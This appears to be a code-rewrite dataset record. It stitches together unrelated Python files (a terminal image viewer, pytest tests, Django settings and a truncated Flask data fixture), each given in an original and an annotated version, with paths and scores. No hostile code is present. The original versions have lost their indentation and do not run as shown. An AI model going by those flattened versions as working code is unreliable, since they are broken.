im = newimg.im.convert('P', 1, self.pal.im)
newimg = newimg._makeself(im)
padding = height % 2
lastfg = lastbg = None
yield '\x1b[?25l\x1b[2J\x1b[1H'
for y in range(0, height, 2):
if y:
yield '\n'
if padding and y == height-1:
yield '\x1b[49m'
for x in range(width):
fg = newimg.getpixel((x, y))
if lastfg != fg or self.colors == 16:
yield self.func_fg(fg)
lastfg = fg
if not padding or y != height-1:
bg = newimg.getpixel((x, y+1))
if lastbg != bg:
yield self.func_bg(bg)
lastbg = bg
yield '▀'
yield '\x1b[0;39;49m'
yield '\x1b[?25h'
def paint(filename, mode='24b', palette=None, width=None, height=None):
if not palette:
term = os.environ.get('TERM', '')
if os.environ.get('VTE_VERSION') and term.endswith('-256color'):
palette = 'tango'
elif term == 'linux':
palette = 'linux'
elif term.startswith('rxvt'):
palette = 'rxvt'
else:
palette = 'xterm'
ia = Image2ANSI(mode, palette)
img = Image.open(filename)
if width and not height:
width = int(width)
height = int(width / img.width * img.height)
elif height and not width:
height = int(height)
width = int(height / img.height * img.width)
else:
width, height = get_terminal_dimensions()
height *= 2
neww = int(height / img.height * img.width)
newh = int(width / img.width * img.height)
if neww > width:
height = newh
elif newh > height:
width = neww
for s in ia.convert(img, width, height):
sys.stdout.write(s)
sys.stdout.flush()
try:
input()
except (EOFError, KeyboardInterrupt) as ex:
pass
if __name__ == '__main__':
sys.exit(paint(*sys.argv[1:])) | termivis.py |
import os
import sys
import fcntl
import struct
import termios
import argparse
import itertools
from PIL import Image
from PIL.ImagePalette import ImagePalette
PALETTES = {
'tango': (
(0x00, 0x00, 0x00), (0xcc, 0x00, 0x00),
(0x4e, 0x9a, 0x06), (0xc4, 0xa0, 0x00),
(0x34, 0x65, 0xa4), (0x75, 0x50, 0x7b),
(0x06, 0x98, 0x9a), (0xd3, 0xd7, 0xcf),
(0x55, 0x57, 0x53), (0xef, 0x29, 0x29),
(0x8a, 0xe2, 0x34), (0xfc, 0xe9, 0x4f),
(0x72, 0x9f, 0xcf), (0xad, 0x7f, 0xa8),
(0x34, 0xe2, 0xe2), (0xee, 0xee, 0xec)
),
'linux': (
(0x00, 0x00, 0x00), (0xaa, 0x00, 0x00),
(0x00, 0xaa, 0x00), (0xaa, 0x55, 0x00),
(0x00, 0x00, 0xaa), (0xaa, 0x00, 0xaa),
(0x00, 0xaa, 0xaa), (0xaa, 0xaa, 0xaa),
(0x55, 0x55, 0x55), (0xff, 0x55, 0x55),
(0x55, 0xff, 0x55), (0xff, 0xff, 0x55),
(0x55, 0x55, 0xff), (0xff, 0x55, 0xff),
(0x55, 0xff, 0xff), (0xff, 0xff, 0xff)
),
'xterm': (
(0x00, 0x00, 0x00), (0xcd, 0x00, 0x00),
(0x00, 0xcd, 0x00), (0xcd, 0xcd, 0x00),
(0x00, 0x00, 0xee), (0xcd, 0x00, 0xcd),
(0x00, 0xcd, 0xcd), (0xe5, 0xe5, 0xe5),
(0x7f, 0x7f, 0x7f), (0xff, 0x00, 0x00),
(0x00, 0xff, 0x00), (0xff, 0xff, 0x00),
(0x5c, 0x5c, 0xff), (0xff, 0x00, 0xff),
(0x00, 0xff, 0xff), (0xff, 0xff, 0xff)
),
'rxvt': (
(0x00, 0x00, 0x00), (0xcd, 0x00, 0x00),
(0x00, 0xcd, 0x00), (0xcd, 0xcd, 0x00),
(0x00, 0x00, 0xcd), (0xcd, 0x00, 0xcd),
(0x00, 0xcd, 0xcd), (0xfa, 0xeb, 0xd7),
(0x40, 0x40, 0x40), (0xff, 0x00, 0x00),
(0x00, 0xff, 0x00), (0xff, 0xff, 0x00),
(0x00, 0x00, 0xff), (0xff, 0x00, 0xff),
(0x00, 0xff, 0xff), (0xff, 0xff, 0xff)
),
'solarized': (
(0x07, 0x36, 0x42), (0xdc, 0x32, 0x2f),
(0x85, 0x99, 0x00), (0xb5, 0x89, 0x00),
(0x26, 0x8b, 0xd2), (0xd3, 0x36, 0x82),
(0x2a, 0xa1, 0x98), (0xee, 0xe8, 0xd5),
(0x00, 0x2b, 0x36), (0xcb, 0x4b, 0x16),
(0x58, 0x6e, 0x75), (0x65, 0x7b, 0x83),
(0x83, 0x94, 0x96), (0x6c, 0x71, 0xc4),
(0x93, 0xa1, 0xa1), (0xfd, 0xf6, 0xe3)
)
}
ANSI_256 = tuple(tuple(int(x[y*2:(y+1)*2], 16) for y in range(3)) for x in (
'000000,00005f,000087,0000af,0000d7,0000ff,005f00,005f5f,'
'005f87,005faf,005fd7,005fff,008700,00875f,008787,0087af,'
'0087d7,0087ff,00af00,00af5f,00af87,00afaf,00afd7,00afff,'
'00d700,00d75f,00d787,00d7af,00d7d7,00d7ff,00ff00,00ff5f,'
'00ff87,00ffaf,00ffd7,00ffff,5f0000,5f005f,5f0087,5f00af,'
'5f00d7,5f00ff,5f5f00,5f5f5f,5f5f87,5f5faf,5f5fd7,5f5fff,'
'5f8700,5f875f,5f8787,5f87af,5f87d7,5f87ff,5faf00,5faf5f,'
'5faf87,5fafaf,5fafd7,5fafff,5fd700,5fd75f,5fd787,5fd7af,'
'5fd7d7,5fd7ff,5fff00,5fff5f,5fff87,5fffaf,5fffd7,5fffff,'
'870000,87005f,870087,8700af,8700d7,8700ff,875f00,875f5f,'
'875f87,875faf,875fd7,875fff,878700,87875f,878787,8787af,'
'8787d7,8787ff,87af00,87af5f,87af87,87afaf,87afd7,87afff,'
'87d700,87d75f,87d787,87d7af,87d7d7,87d7ff,87ff00,87ff5f,'
'87ff87,87ffaf,87ffd7,87ffff,af0000,af005f,af0087,af00af,'
'af00d7,af00ff,af5f00,af5f5f,af5f87,af5faf,af5fd7,af5fff,'
'af8700,af875f,af8787,af87af,af87d7,af87ff,afaf00,afaf5f,'
'afaf87,afafaf,afafd7,afafff,afd700,afd75f,afd787,afd7af,'
'afd7d7,afd7ff,afff00,afff5f,afff87,afffaf,afffd7,afffff,'
'd70000,d7005f,d70087,d700af,d700d7,d700ff,d75f00,d75f5f,'
'd75f87,d75faf,d75fd7,d75fff,d78700,d7875f,d78787,d787af,'
'd787d7,d787ff,d7af00,d7af5f,d7af87,d7afaf,d7afd7,d7afff,'
'd7d700,d7d75f,d7d787,d7d7af,d7d7d7,d7d7ff,d7ff00,d7ff5f,'
'd7ff87,d7ffaf,d7ffd7,d7ffff,ff0000,ff005f,ff0087,ff00af,'
'ff00d7,ff00ff,ff5f00,ff5f5f,ff5f87,ff5faf,ff5fd7,ff5fff,'
'ff8700,ff875f,ff8787,ff87af,ff87d7,ff87ff,ffaf00,ffaf5f,'
'ffaf87,ffafaf,ffafd7,ffafff,ffd700,ffd75f,ffd787,ffd7af,'
'ffd7d7,ffd7ff,ffff00,ffff5f,ffff87,ffffaf,ffffd7,ffffff,'
'080808,121212,1c1c1c,262626,303030,3a3a3a,444444,4e4e4e,'
'585858,626262,6c6c6c,767676,808080,8a8a8a,949494,9e9e9e,'
'a8a8a8,b2b2b2,bcbcbc,c6c6c6,d0d0d0,dadada,e4e4e4,eeeeee'
).split(','))
def _getdimensions():
    """Return the terminal size as (width, height) via TIOCGWINSZ on stdout.

    Raises OSError if fd 1 is not a tty; callers are expected to handle it.
    """
    # TIOCGWINSZ fills a struct winsize of four unsigned shorts:
    # (ws_row, ws_col, ws_xpixel, ws_ypixel).
    # BUGFIX: fcntl.ioctl requires a bytes buffer on Python 3; the original
    # passed a str ("\000"*8), which raises TypeError there.
    call = fcntl.ioctl(1, termios.TIOCGWINSZ, b"\000" * 8)
    height, width = struct.unpack("hhhh", call)[:2]
    return width, height
def get_terminal_dimensions():
    """Best-effort terminal size as (width, height).  Copied from PyPy."""
    try:
        width, height = _getdimensions()
    except (KeyboardInterrupt, SystemExit, MemoryError, GeneratorExit):
        raise
    except:
        # FALLBACK: the ioctl is unavailable (not a tty, non-Unix, ...) --
        # trust the environment, defaulting to an 80x80 area.
        return (int(os.environ.get('COLUMNS', 80)),
                int(os.environ.get('LINES', 80)))
    # XXX the windows getdimensions may be bogus, let's sanify a bit
    if width < 40:
        return 80, 24
    return width, height
class Image2ANSI:
    """Convert a PIL image to ANSI escape sequences, two pixels per text row.

    Each character cell renders an upper-half block (U+2580) whose foreground
    color is the upper pixel and whose background color is the lower pixel.
    """

    # Palette used when the caller does not supply one.
    DEFAULT_PALETTE = 'tango'

    def __init__(self, mode, palette=None):
        """mode: '4b' (16 colors), '8b' (256 colors), anything else = 24-bit.

        palette: key into PALETTES; defaults to DEFAULT_PALETTE.
        """
        if mode == '4b':
            self.colors = 16
            # Quantization palette image; PIL palettes hold 256 entries,
            # so the 16 colors are repeated 16 times.
            self.pal = Image.new('P', (4, 4))
            self.pal.putpalette(
                tuple(itertools.chain.from_iterable(
                    # BUGFIX: DEFAULT_PALETTE is a class attribute and was
                    # referenced as a bare name, raising NameError whenever
                    # palette was omitted.
                    PALETTES[palette or self.DEFAULT_PALETTE])) * 16
            )
            self.pal.load()
            # Bright colors (8-15) use the 9x/10x SGR codes, normal 3x/4x.
            self.func_fg = lambda x: '\x1b[%d%dm' % (9 if x//8 else 3, x%8)
            self.func_bg = lambda x: '\x1b[%d%dm' % (10 if x//8 else 4, x%8)
        elif mode == '8b':
            self.colors = 256
            self.pal = Image.new('P', (16, 16))
            self.pal.putpalette(
                tuple(itertools.chain.from_iterable(
                    # Same bare-name BUGFIX as the '4b' branch above.
                    PALETTES[palette or self.DEFAULT_PALETTE] + ANSI_256))
            )
            self.pal.load()
            self.func_fg = lambda x: '\x1b[38;5;%dm' % x
            self.func_bg = lambda x: '\x1b[48;5;%dm' % x
        else:
            # 24-bit truecolor: pixels are emitted directly, no palette.
            self.colors = None
            self.pal = None
            self.func_fg = lambda x: '\x1b[38;2;%d;%d;%dm' % x
            self.func_bg = lambda x: '\x1b[48;2;%d;%d;%dm' % x

    def convert(self, img, width, height):
        """Yield ANSI string chunks rendering *img* at width x height pixels.

        height is in pixels (two per text row); an odd height leaves the
        last row's background at the terminal default.
        """
        newimg = img.convert('RGB').resize((width, height), Image.LANCZOS)
        if self.pal:
            # Quantize without dithering against the prepared palette.
            im = newimg.im.convert('P', 1, self.pal.im)
            newimg = newimg._makeself(im)
        padding = height % 2
        lastfg = lastbg = None
        # Hide the cursor, clear the screen, home the cursor.
        yield '\x1b[?25l\x1b[2J\x1b[1H'
        for y in range(0, height, 2):
            if y:
                yield '\n'
            if padding and y == height-1:
                yield '\x1b[49m'  # default background for the odd last row
            for x in range(width):
                fg = newimg.getpixel((x, y))
                # NOTE(review): in 16-color mode the foreground code is
                # re-emitted every cell, presumably because the bright/normal
                # SGR codes interact -- confirm before simplifying.
                if lastfg != fg or self.colors == 16:
                    yield self.func_fg(fg)
                    lastfg = fg
                if not padding or y != height-1:
                    bg = newimg.getpixel((x, y+1))
                    if lastbg != bg:
                        yield self.func_bg(bg)
                        lastbg = bg
                yield '▀'
        # Reset attributes and show the cursor again.
        yield '\x1b[0;39;49m'
        yield '\x1b[?25h'
def paint(filename, mode='24b', palette=None, width=None, height=None):
    """Render image *filename* to the terminal and wait for a key press.

    mode: '4b', '8b' or '24b' color depth.
    palette: PALETTES key; when omitted it is guessed from TERM/VTE_VERSION.
    width/height: target size (height counts half-cells, i.e. pixels); a
    missing dimension is derived from the image aspect ratio, and when both
    are missing the image is fitted to the terminal.
    """
    if not palette:
        # Guess a palette matching the terminal emulator's default colors.
        term = os.environ.get('TERM', '')
        if os.environ.get('VTE_VERSION') and term.endswith('-256color'):
            palette = 'tango'
        elif term == 'linux':
            palette = 'linux'
        elif term.startswith('rxvt'):
            palette = 'rxvt'
        else:
            palette = 'xterm'
    ia = Image2ANSI(mode, palette)
    img = Image.open(filename)
    if width and height:
        # BUGFIX: when both dimensions were supplied, the original fell
        # through to the terminal-fit branch and silently ignored them.
        width = int(width)
        height = int(height)
    elif width:
        width = int(width)
        height = int(width / img.width * img.height)
    elif height:
        height = int(height)
        width = int(height / img.height * img.width)
    else:
        width, height = get_terminal_dimensions()
        height *= 2  # two pixels per character row
        # Shrink-to-fit while preserving the image aspect ratio.
        neww = int(height / img.height * img.width)
        newh = int(width / img.width * img.height)
        if neww > width:
            height = newh
        elif newh > height:
            width = neww
    for s in ia.convert(img, width, height):
        sys.stdout.write(s)
    sys.stdout.flush()
    try:
        input()  # keep the image on screen until the user presses Enter
    except (EOFError, KeyboardInterrupt):
        pass
if __name__ == '__main__':
sys.exit(paint(*sys.argv[1:])) | 0.078269 | 0.271179 |
import pytest
from problems.types import ProblemType
def test_construct_blank_type():
problem_type = ProblemType()
assert problem_type.identifier == "about:blank"
assert problem_type.title == ""
assert problem_type.detail == ""
assert problem_type.extension == {}
# identifier validation
def test_convert_blank_type_to_string():
problem_type = ProblemType()
assert str(problem_type) == "about:blank"
def test_identifier_must_not_be_empty():
with pytest.raises(ValueError):
ProblemType(identifier="")
def test_identifier_inserts_default_scheme():
problem_type = ProblemType("//example.com/baz")
assert problem_type.identifier == "https://example.com/baz"
@pytest.mark.parametrize("input", ("foo/bar", "/foo/bar"))
@pytest.mark.parametrize("expected", ("https://example.com/foo/bar",))
def test_identifier_inserts_default_scheme_and_host(input, expected):
problem_type = ProblemType(input)
assert problem_type.identifier == expected
def test_rejects_unallowed_hostname():
with pytest.raises(ValueError) as ex:
ProblemType("https://foo.bar/baz")
assert str(ex).endswith(
"Host was required to be one of ['example.com'] but was 'foo.bar'"
)
def test_rejects_identifier_without_path():
with pytest.raises(ValueError) as ex:
ProblemType("https://example.com")
assert str(ex).endswith("path was required but missing")
# extensions
@pytest.mark.parametrize("input", ProblemType.BANNED_EXTENSION_NAMES)
def test_extension_is_rejected_if_includes_class_attribute_names(input):
with pytest.raises(ValueError) as ex:
ProblemType(extension={input: {}})
assert str(ex).endswith(f"Extension member name {input} is not allowed.")
def test_extension_is_rejected_if_not_valid_json_schema():
with pytest.raises(TypeError) as ex:
ProblemType(extension={"foo": []})
assert str(ex).endswith("Extension for field 'foo' needs to be a valid JSON schema.")
# serialisation to dict
def test_convert_type_to_dict():
problem_type = ProblemType(
"https://example.com/foo",
"Foo problem",
"Foo fighters attack",
extension={"bar": {}, "baz": {}},
)
assert dict(problem_type) == {
"identifier": "https://example.com/foo",
"title": "Foo problem",
"detail": "Foo fighters attack",
"extension": {"bar": {}, "baz": {}},
}
def test_convert_blank_type_to_dict():
problem_type = ProblemType()
assert dict(problem_type) == {
"identifier": "about:blank",
"title": "",
"detail": "",
"extension": {},
}
# formatting title and description
def test_format_title_simple():
problem_type = ProblemType("https://example.com/foo", extension={"bar": {"type": "string"}})
assert problem_type.format("test {foo}", {"foo": "bar baz bam"}) == "test bar baz bam"
def test_format_title_nested():
nested_schema = {"foo": {"type": "object", "items": {"bar": {"type": "string"}}}}
problem_type = ProblemType("https://example.com/foo", extension=nested_schema)
assert (
problem_type.format("test {foo.bar}", {"foo": {"bar": "bar baz bam"}})
== "test bar baz bam"
)
def test_format_title_raises_error_on_incorrect_nested_key():
nested_schema = {"foo": {"type": "object", "items": {"bar": {"type": "string"}}}}
problem_type = ProblemType("https://example.com/foo", extension=nested_schema)
with pytest.raises(AttributeError) as ex:
problem_type.format("test {foo.baa}", {"foo": {"bar": "bar baz bam"}})
assert "object has no attribute 'baa'" in str(ex.value) | src/tests/test_types.py | import pytest
from problems.types import ProblemType
def test_construct_blank_type():
problem_type = ProblemType()
assert problem_type.identifier == "about:blank"
assert problem_type.title == ""
assert problem_type.detail == ""
assert problem_type.extension == {}
# identifier validation
def test_convert_blank_type_to_string():
problem_type = ProblemType()
assert str(problem_type) == "about:blank"
def test_identifier_must_not_be_empty():
with pytest.raises(ValueError):
ProblemType(identifier="")
def test_identifier_inserts_default_scheme():
problem_type = ProblemType("//example.com/baz")
assert problem_type.identifier == "https://example.com/baz"
@pytest.mark.parametrize("input", ("foo/bar", "/foo/bar"))
@pytest.mark.parametrize("expected", ("https://example.com/foo/bar",))
def test_identifier_inserts_default_scheme_and_host(input, expected):
problem_type = ProblemType(input)
assert problem_type.identifier == expected
def test_rejects_unallowed_hostname():
    """A host outside the allow-list is rejected with a descriptive error."""
    with pytest.raises(ValueError) as ex:
        ProblemType("https://foo.bar/baz")
    # BUGFIX: str(ex) formats the pytest ExceptionInfo wrapper, not the
    # exception; the message must be read from ex.value.
    assert str(ex.value).endswith(
        "Host was required to be one of ['example.com'] but was 'foo.bar'"
    )
def test_rejects_identifier_without_path():
    """An identifier URL must carry a path component."""
    with pytest.raises(ValueError) as ex:
        ProblemType("https://example.com")
    # BUGFIX: read the message from ex.value, not the ExceptionInfo wrapper.
    assert str(ex.value).endswith("path was required but missing")
# extensions
@pytest.mark.parametrize("input", ProblemType.BANNED_EXTENSION_NAMES)
def test_extension_is_rejected_if_includes_class_attribute_names(input):
    """Extension members must not shadow ProblemType's own attribute names."""
    with pytest.raises(ValueError) as ex:
        ProblemType(extension={input: {}})
    # BUGFIX: compare against the exception message (ex.value), not the
    # ExceptionInfo wrapper.
    assert str(ex.value).endswith(f"Extension member name {input} is not allowed.")
def test_extension_is_rejected_if_not_valid_json_schema():
    """Each extension value must be a JSON-schema dict."""
    with pytest.raises(TypeError) as ex:
        ProblemType(extension={"foo": []})
    # BUGFIX: ex is an ExceptionInfo; the message lives on ex.value.
    assert str(ex.value).endswith("Extension for field 'foo' needs to be a valid JSON schema.")
# serialisation to dict
def test_convert_type_to_dict():
problem_type = ProblemType(
"https://example.com/foo",
"Foo problem",
"Foo fighters attack",
extension={"bar": {}, "baz": {}},
)
assert dict(problem_type) == {
"identifier": "https://example.com/foo",
"title": "Foo problem",
"detail": "Foo fighters attack",
"extension": {"bar": {}, "baz": {}},
}
def test_convert_blank_type_to_dict():
    """dict() on a default ProblemType yields the documented blank fields."""
    expected = {
        "identifier": "about:blank",
        "title": "",
        "detail": "",
        "extension": {},
    }
    assert dict(ProblemType()) == expected
# formatting title and description
def test_format_title_simple():
problem_type = ProblemType("https://example.com/foo", extension={"bar": {"type": "string"}})
assert problem_type.format("test {foo}", {"foo": "bar baz bam"}) == "test bar baz bam"
def test_format_title_nested():
nested_schema = {"foo": {"type": "object", "items": {"bar": {"type": "string"}}}}
problem_type = ProblemType("https://example.com/foo", extension=nested_schema)
assert (
problem_type.format("test {foo.bar}", {"foo": {"bar": "bar baz bam"}})
== "test bar baz bam"
)
def test_format_title_raises_error_on_incorrect_nested_key():
nested_schema = {"foo": {"type": "object", "items": {"bar": {"type": "string"}}}}
problem_type = ProblemType("https://example.com/foo", extension=nested_schema)
with pytest.raises(AttributeError) as ex:
problem_type.format("test {foo.baa}", {"foo": {"bar": "bar baz bam"}})
assert "object has no attribute 'baa'" in str(ex.value) | 0.816113 | 0.771241 |
import pathlib
from django.utils.translation import ugettext_lazy as _
import dj_database_url
from .env import env
BASE_DIR = pathlib.Path(__file__).parent.parent
SETTINGS_DIR = BASE_DIR / 'settings'
APPS_DIR = BASE_DIR / 'apps'
ALLOWED_HOSTS = ['*'] # Host checking done by web server.
ROOT_URLCONF = 'apps.urls'
WSGI_APPLICATION = 'apps.wsgi.application'
AUTH_USER_MODEL = 'users.User'
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
]
AUTHENTICATION_BACKENDS = (
'social.backends.facebook.FacebookOAuth2',
'django.contrib.auth.backends.ModelBackend',
)
SOCIAL_AUTH_USER_FIELDS = ['email']
SOCIAL_AUTH_PROFILE_EXTRA_PARAMS = {'fields': 'email'}
SOCIAL_AUTH_FACEBOOK_SCOPE = ['public_profile', 'email']
SOCIAL_AUTH_FACEBOOK_KEY = env('SOCIAL_AUTH_FACEBOOK_KEY')
SOCIAL_AUTH_FACEBOOK_SECRET = env('SOCIAL_AUTH_FACEBOOK_SECRET')
SOCIAL_AUTH_FACEBOOK_PROFILE_EXTRA_PARAMS = {
'fields': 'id, email, first_name, last_name'
}
SOCIAL_AUTH_PIPELINE = (
'social.pipeline.social_auth.social_details',
'social.pipeline.social_auth.social_uid',
'social.pipeline.social_auth.auth_allowed',
'social.pipeline.social_auth.social_user',
'social.pipeline.user.get_username',
'apps.users.pipeline.create_user',
'social.pipeline.social_auth.associate_user',
'social.pipeline.social_auth.load_extra_data',
'social.pipeline.user.user_details'
)
# Mail
EMAIL_BACKEND = 'djmail.backends.default.EmailBackend'
DJMAIL_MAX_RETRY_NUMBER = 3
INSTALLED_APPS = [
# Django
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# Third party
'rest_framework',
'rest_framework.authtoken',
'djmail',
'corsheaders',
'avatar',
'easy_thumbnails',
'django_jinja',
'crispy_forms',
'social.apps.django_app.default',
# Apps
'apps.api',
'apps.base',
'apps.users',
'apps.family',
'apps.cards',
'apps.chores',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
TEMPLATES = [
{
"BACKEND": "django_jinja.backend.Jinja2",
'DIRS': [str(APPS_DIR / 'templates')],
"APP_DIRS": True,
"OPTIONS": {
"match_extension": ".j2",
}
},
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [str(APPS_DIR / 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# https://github.com/kennethreitz/dj-database-url#url-schema
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(env('DATABASE_URL'))
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LANGUAGES = [
('en', _('English')),
]
# For reverse proxying
USE_X_FORWARDED_HOST = True
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTOCOL", "https")
# Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'root': {
'handlers': ['console'],
'level': 'INFO',
},
'formatters': {
'simple': {
'format': '[%(name)s] [%(levelname)s] %(message)s'
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
},
'loggers': {
}
}
# Allow requests from any domain.
CORS_ORIGIN_ALLOW_ALL = True
# Rest Framework
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 30,
'DEFAULT_VERSIONING_CLASS': 'rest_framework.versioning.NamespaceVersioning',
'ORDERING_PARAM': 'order_by',
'TEST_REQUEST_DEFAULT_FORMAT': 'json',
}
# Avatars
AVATAR_GRAVATAR_DEFAULT = 'retro'
AVATAR_STORAGE_DIR = 'user-avatars'
AVATAR_MAX_AVATARS_PER_USER = 1 | settings/base.py | import pathlib
from django.utils.translation import ugettext_lazy as _
import dj_database_url
from .env import env
BASE_DIR = pathlib.Path(__file__).parent.parent
SETTINGS_DIR = BASE_DIR / 'settings'
APPS_DIR = BASE_DIR / 'apps'
ALLOWED_HOSTS = ['*'] # Host checking done by web server.
ROOT_URLCONF = 'apps.urls'
WSGI_APPLICATION = 'apps.wsgi.application'
AUTH_USER_MODEL = 'users.User'
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
]
AUTHENTICATION_BACKENDS = (
'social.backends.facebook.FacebookOAuth2',
'django.contrib.auth.backends.ModelBackend',
)
SOCIAL_AUTH_USER_FIELDS = ['email']
SOCIAL_AUTH_PROFILE_EXTRA_PARAMS = {'fields': 'email'}
SOCIAL_AUTH_FACEBOOK_SCOPE = ['public_profile', 'email']
SOCIAL_AUTH_FACEBOOK_KEY = env('SOCIAL_AUTH_FACEBOOK_KEY')
SOCIAL_AUTH_FACEBOOK_SECRET = env('SOCIAL_AUTH_FACEBOOK_SECRET')
SOCIAL_AUTH_FACEBOOK_PROFILE_EXTRA_PARAMS = {
'fields': 'id, email, first_name, last_name'
}
SOCIAL_AUTH_PIPELINE = (
'social.pipeline.social_auth.social_details',
'social.pipeline.social_auth.social_uid',
'social.pipeline.social_auth.auth_allowed',
'social.pipeline.social_auth.social_user',
'social.pipeline.user.get_username',
'apps.users.pipeline.create_user',
'social.pipeline.social_auth.associate_user',
'social.pipeline.social_auth.load_extra_data',
'social.pipeline.user.user_details'
)
# Mail
EMAIL_BACKEND = 'djmail.backends.default.EmailBackend'
DJMAIL_MAX_RETRY_NUMBER = 3
INSTALLED_APPS = [
# Django
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# Third party
'rest_framework',
'rest_framework.authtoken',
'djmail',
'corsheaders',
'avatar',
'easy_thumbnails',
'django_jinja',
'crispy_forms',
'social.apps.django_app.default',
# Apps
'apps.api',
'apps.base',
'apps.users',
'apps.family',
'apps.cards',
'apps.chores',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
TEMPLATES = [
{
"BACKEND": "django_jinja.backend.Jinja2",
'DIRS': [str(APPS_DIR / 'templates')],
"APP_DIRS": True,
"OPTIONS": {
"match_extension": ".j2",
}
},
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [str(APPS_DIR / 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# https://github.com/kennethreitz/dj-database-url#url-schema
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(env('DATABASE_URL'))
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LANGUAGES = [
('en', _('English')),
]
# For reverse proxying
USE_X_FORWARDED_HOST = True
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTOCOL", "https")
# Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'root': {
'handlers': ['console'],
'level': 'INFO',
},
'formatters': {
'simple': {
'format': '[%(name)s] [%(levelname)s] %(message)s'
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
},
'loggers': {
}
}
# Allow requests from any domain.
CORS_ORIGIN_ALLOW_ALL = True
# Rest Framework
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 30,
'DEFAULT_VERSIONING_CLASS': 'rest_framework.versioning.NamespaceVersioning',
'ORDERING_PARAM': 'order_by',
'TEST_REQUEST_DEFAULT_FORMAT': 'json',
}
# Avatars
AVATAR_GRAVATAR_DEFAULT = 'retro'
AVATAR_STORAGE_DIR = 'user-avatars'
AVATAR_MAX_AVATARS_PER_USER = 1 | 0.263599 | 0.092115 |
from flask import request
from flask_restplus import Resource
from .models import AuthUser, SpeedtestCustomer
from .schemas import CustomerSchema, UserSchema
from sqlalchemy import func
import random, math
from app import db
import uuid
from flask_script import Command
import timeit
DATA = [
{
"id": 1,
"name": "260861f4-1008-49d3-87ef-dbd32b78fae7",
"amount": 958603672,
"user": {
"id": 27160,
"username": "260861f4-1<PASSWORD>-<PASSWORD>-87ef-<PASSWORD>fae7",
"email": "260861f4-1008-49d3-87ef-dbd32b78fae7"
}
},
{
"id": 2,
"name": "e38b4cdc-b2c9-4452-a9ed-c326c2e7f998",
"amount": 505838560,
"user": {
"id": 27161,
"username": "e38b4cdc-b2c9-4452-a9ed-c326c2e7f998",
"email": "e38b4cdc-b2c9-4452-a9ed-c326c2e7f998"
}
},
{
"id": 3,
"name": "f6d80e74-e340-49c3-a40b-02d7f1c7f874",
"amount": 590426501,
"user": {
"id": 27162,
"username": "f6d80e74-e340-49c3-a40b-02d7f1c7f874",
"email": "f6d80e74-e340-49c3-a40b-02d7f1c7f874"
}
},
{
"id": 4,
"name": "72188cda-2901-4e8c-92d2-f6a78a74cb1c",
"amount": 733092617,
"user": {
"id": 27163,
"username": "72188cda-<PASSWORD>-<PASSWORD>",
"email": "72188cda-2901-4e8c-92d2-f6a78a74cb1c"
}
},
{
"id": 5,
"name": "4c6f778b-8f16-489c-bb52-4bea615af711",
"amount": 395133510,
"user": {
"id": 27164,
"username": "4c6f778b-8f16-489c-bb52-4bea615af711",
"email": "4c6f778b-8f16-489c-bb52-4bea615af711"
}
},
{
"id": 6,
"name": "2d89c7fc-5ebd-4e63-aaea-086b254a9b1a",
"amount": 4636042,
"user": {
"id": 27165,
